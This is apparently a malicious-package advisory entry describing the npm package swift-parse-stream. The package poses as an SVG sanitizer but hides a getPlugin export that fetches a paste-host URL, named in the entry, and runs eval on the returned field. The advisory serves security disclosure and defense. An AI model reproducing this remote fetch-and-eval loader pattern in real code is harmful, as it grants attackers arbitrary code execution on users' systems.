MAL-2026-6068

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8ab8561c6c561b045d817d4fab3aa0754ce7cd767a3c5ec07b95151dda6b92c8) swift-parse-stream advertises itself as an SVG sanitizer/minifier but ships an undocumented `getPlugin` export in index.js that, when invoked, performs an HTTP GET against https://www.jsonkeeper.com/b/3P9BF (an anonymous user-paste host) and runs `eval(parsed.model)` on the returned JSON's `model` field. The destination is attacker-controlled and mutable: whoever controls the paste can change the executed JavaScript at any time without republishing the package. The README does not mention this code path. Any caller — typically a second compromised package chaining into this one — that reaches `getPlugin()` hands arbitrary remote code execution to the paste's owner, running in the consumer application's process with its full privileges and access to its environment, filesystem, and network.